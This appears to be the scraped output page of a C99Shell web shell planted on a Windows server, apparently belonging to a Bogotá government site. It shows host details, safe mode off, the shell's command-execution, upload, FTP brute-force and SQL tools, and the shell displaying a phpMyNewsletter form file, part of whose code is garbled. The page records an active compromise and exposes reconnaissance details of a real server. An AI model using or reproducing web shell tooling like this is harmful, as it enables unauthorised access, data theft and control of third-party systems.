!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\boletinprensa\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     form.php (1.41 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// you can include this form in any page of
// your website as follow:
//
// in this file, provide correct values for:
// $path_to_pmnl
// $list_id newsletter id
// then in your page (need to be a php page) 
// add this line :
// include("path/to/this/page/form.php");
// NOTA: your page need to use UTF8 encoding
// put 
// <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
// in your html header




//path to phpMyNewsletter base directory
$path_to_pmnl="./";

// newsletter id, leave this empty if you want to list available
// newsletter.

//$list_id = 1;
$list_id "";

//display archive link (true or false) ?
$display_archive=true;







////////////////////// DO NOT MODIFY /////////////////////

if(file_exists("./".$path_to_pmnl."include/config.php")){
  include(
"./".$path_to_pmnl."include/config.php");
  include(
"./".$path_to_pmnl."include/db/db_".$db_type.".inc.php");
}
include(
"./".$path_to_pmnl."include/lib/libconfig.php");
include(
"./".$path_to_pmnl."include/interface.php");
include(
"./".$path_to_pmnl."include/lib/libnewsletter.php");
include(
"./".$path_to_pmnl."admin/include/function.php");


if(
file_exists("./".$path_to_pmnl."include/config.php")){
   print 
newsletter_list($list_idtrue$display_archive);
  } else {
  include 
"./".$path_to_pmnl."include/lang/english.php";
  echo 
error_msg(translate("NEWSLETTER_NOT_YET"));
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--